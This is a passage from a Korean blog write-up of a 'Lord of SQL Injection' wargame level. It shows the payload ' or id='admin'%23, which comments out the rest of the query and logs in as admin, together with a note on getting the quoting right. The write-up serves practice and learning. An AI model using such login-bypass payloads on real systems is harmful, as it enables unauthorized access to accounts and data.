뒤에 1=0은 주석으로 날리라고 힌트를 주는 것 같다.
?id='g'&pw=' or id='admin'%23
앞부분은 그렇게 중요하지 않고 pw에서 쿼터만 잘 맞춰주면 되는 문제였다. 뒤에 admin을 적을 때 싱글 쿼터를 적지 않으면 클리어되지 않는다.
pw=' or id='admin'%23
이것도 클리어가 가능했다.
'Web Hacking > LoS' 카테고리의 다른 글
| [Lord of SQL Injection] los darkknight (0) | 2021.07.18 |
|---|---|
| [Lord of SQLINJECTION] los golem (0) | 2021.07.11 |
| [Lord of SQL Injection] los vampire (0) | 2021.06.28 |
| [Lord of SQL Injection] los troll (0) | 2021.06.27 |
| [Lord of SQL Injection] orge (0) | 2021.05.29 |